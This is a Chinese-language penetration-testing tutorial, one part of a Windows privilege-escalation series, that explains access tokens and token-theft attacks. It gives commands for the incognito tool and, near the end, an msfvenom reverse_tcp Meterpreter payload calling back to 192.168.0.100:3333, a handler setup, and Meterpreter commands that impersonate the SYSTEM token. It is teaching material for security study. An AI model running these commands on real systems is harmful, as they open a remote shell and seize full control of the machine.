系列文章

操作系统权限提升(十二)之绕过UAC提权-Windows UAC概述
操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权
操作系统权限提升(十四)之绕过UAC提权-基于白名单AutoElevate绕过UAC提权
操作系统权限提升(十五)之绕过UAC提权-基于白名单DLL劫持绕过UAC提权
操作系统权限提升(十六)之绕过UAC提权-CVE-2019-1388 UAC提权

注：阅读本编文章前，请先阅读系列文章，以免造成看不懂的情况！！

Windows令牌概述和令牌窃取攻击

Windows令牌

令牌（Token）是系统的临时密钥，相当于账户名和密码，用来决定是否允许这次请求和判断这次请求是属于哪一个用户的，它允许你在不提供密码或其他凭证的前提下，访问网络和系统资源，这些令牌持续存在系统中，除非系统重新启动

令牌最大的特点就是随机性，不可预测，一般黑客或软件无法猜测出来，令牌有很多种

访问令牌（Access Token）表示访问控制操作主题的系统对象
会话令牌(Session Token)：是交互会话中唯一的身份标识符，可以理解为web中的token
密保令牌（Security Token）又叫作认证令牌或者硬件令牌，是一种计算机身份效验的物理设备

Windows 的访问令牌（ AccessToken） 中包含如下内容

用户账户的安全标识符(SID)
用户所属的组的SID
用于标识当前登陆会话的登陆SID
用户或用户组所拥有的权限列表
所有者SID
主要组的SID
访问控制列表
访问令牌的来源
令牌是主要令牌还是模拟令牌
限制SID的可选列表
目前的模拟等级
其他统计的数据

Windows 的访问令牌（ AccessToken） 有两种类型

Delegation Token：授权令牌，也叫主令牌，支持交互式会话登录 (例如本地用户直接登录、远程桌面登录访问)Impresonation Token：模拟令牌，支持非交互的会话 (例如使用 net use访问共享文件夹)

两种 token 只在系统重启后清除 具有 Delegation token 的用户在注销后，该 Token 将变成Impersonation token，依旧有效

令牌窃取

incognito窃取令牌

incognito.exe是一个令牌窃取的工具，常用用法如下

incognito.exe list_tokens -u 列出用户的令牌
incognito.exe execute -c "令牌" 程序名 使用窃取的令牌执行命令

1、当我们拿到一个权限的时候，如果是普通的用户或者有UAC认证的管理员用户，可以窃取的令牌只有自己的令牌不能用于提权

2、如果是administrator或者绕过的UAC的管理员，就可以窃取到system用户的令牌

3、使用窃取的令牌进行提权

MSF中的令牌窃取

1、使用MSF上线，然后加载incognito

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.100 LPORT=3333 -f exe -o test.exe

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.100
set lport 3333
run

2、加载incognito，进行令牌窃取，用法如下

load incognito 加载incognito
list_tokens -u 列举token令牌
impersonate_token "NT AUTHORITY\SYSTEM" 权限窃取
rev2self 或 drop_token 返回之前token